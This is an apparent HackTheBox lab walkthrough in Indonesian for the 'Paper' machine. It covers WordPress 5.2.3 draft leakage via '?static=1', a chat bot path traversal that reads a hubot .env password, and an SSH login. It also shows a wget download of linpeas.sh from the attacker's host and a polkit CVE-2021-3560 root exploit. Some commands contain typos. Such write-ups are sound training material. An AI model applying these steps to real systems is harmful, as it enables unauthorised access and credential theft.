Informations Gathering
Seperti biasa kita mulai dengan mencari informasi dengan menggunakan nmap
sudo nmap -sC -sV -T5 -o hasil.txt 10.10.11.143
Kita bisa melihat bahwa hasilnya ada SSH,SSL,dan apache terbuka pada port default mereka,kemudian saya mencoba lagi dengan menggunakan perintah curl.
curl -I http://10.110.11.143
Saya menemukan bahwa X-Backend-server adalah ofice.paper,jadi saya menabahkan nya kedalam file /etc/hosts,dengan menggunakan perintah
nano /etc/hosts
dan memasukan ip addres dan backend-server nya.
kira-kira hasilnya jadi seperti ini
10.10.11.143 office.paper
127.0.0.1 kali localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Kemudian saya pergi ke browser dan menelusuri backend servernya,https://office.paper/,dan saya melihat sebuah web dengan nama Blunder tiffin inc.
Saya menggunakan extensions chrome bernama Wappalyzer untuk mengetahui apa saja yang di pakai oleh web tersebut,dan saya melihat bahwa web tersebut menggunakan wordpess.
Untuk langkah selanjutnya saya mencoba scan web tersebut dengan tolls yang bernama wpscan,saya memasukkan perintah
wpscan --url http://office.paper/ -e vp,vt,u
Dan saya juga mendapatkan hasil,bahwa wodpress yang dipakai adalah worpress version 5.2.3
Saya jelaskan dulu kenapa saya mencari versi wordpressnya,alasannya adalah biar saya bisa tahu jenis exploit apa yang bisa di pakai untuk mengexploit wweb tersebut.
Nah sekarang kita cari lagi di browser jenis exploit yang bisa dipakai untuk wordpress versi 5.2.3.
Cukup cari aja di google dengan query wordpress 5.2.3 exploit
Ada banyak hasil yang di tampilkan,tetapi saya mencoba yang https://www.exploit-db.com/exploits/47690
Dan saya melihat isinya adalah sebagai berikut:
So far we know that adding `?static=1` to a wordpress URL should leak its secret content
Here are a few ways to manipulate the returned entries:
- `order` with `asc` or `desc`
- `orderby`
- `m` with `m=YYYY`, `m=YYYYMM` or `m=YYYYMMDD` date format
In this case, simply reversing the order of the returned elements suffices and `http://
wordpress.local/?static=1&order=asc` will show the secret content:
Disana saya melihat ada ?static=1,dan saya menambahkan nya ke belakang url ofice.paper tadi,seperti ini http://office.paper/?static=1.
Dan di web tersebut saya menemukan link registrasi,terlihat seperti ini http://chat.office.paper/register/8qozr226AhkCHZdyY
Terlihat disitu tertulis chat.office.paper,dan saya mencoba menambahkannya lagi ke /etc/hosts,sama seperti tadi.Hasilnya terlihat seperti ini.
10.10.11.143 office.paper chat.office.paper
127.0.0.1 kali localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Ketika saya sudah daftar dan masuk,saya menemukan ada web obrolan umum,dan saya menemukan bahwa DwightKSchrute adalah admin dan dia membuat bot bernama Recyclops,kemudian saya klik recyclops untuk masuk ke sesi chat nya.
kemedian saya mengetik recyclops help,dan disitu banyak perintah-peerintah yang bisa di pakai.Kemudian saya mengetikan recyclops list ../,bisa kita lihat ada banyak file di tampilkan,dan saya melihat ada file hubot/env.
Kemudian saya mengetikan recyclops file ../hubot/.env,dan kita di tampilkan password disitu,password itu kita pakai untuk masuk ke ssh nya.
Setelah kita mendapatkan password nya kita sekarang masuk ke ssh nya dengan perintah:
ssh@dwight10.10.11.143
dan masukkan password nya yang tai didapat dari recyclops.
Sekarang saya sudah berada di dalam mesin nya,langkah berikutnya saya mengunduh linpeas.sh
Buka terminal baru dan masukkan:
python3 -m http.server 9003
masuk lagi ke terminal ssh nya dan massukan:
wget http://172.17.0.1:9003/linpeas.sh
Untuk ip addres nya ketikkan dulu ip addr dan ambil yang inet.
Setelah kita dapat filenya kita buka dengan perintah:
chmod +x linpeas.sh
./linpeas.sh
Saya melihat website ini rentan terhadap cvE-2021-3560 ,kemudian saya cari di google dengan query cvE-2021-3560 exploit,dan saya memilih yang https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation,untuk pilihannya banyak dan bisa coba yang mana saja.
Kemudian menyalin isi file poc.sh nya dan saya pergi ke terminal ssh kemudian membuat file poc.sh dan memasukkan isi file yang tadi udah disalin.
selanjutnya masukkan:
chmod +x poc.sh
./poc.sh
Sekaang saya sudah berada di directory root nya. dan menmukan root.txt,untuk membacanya,gunakan perintah cat.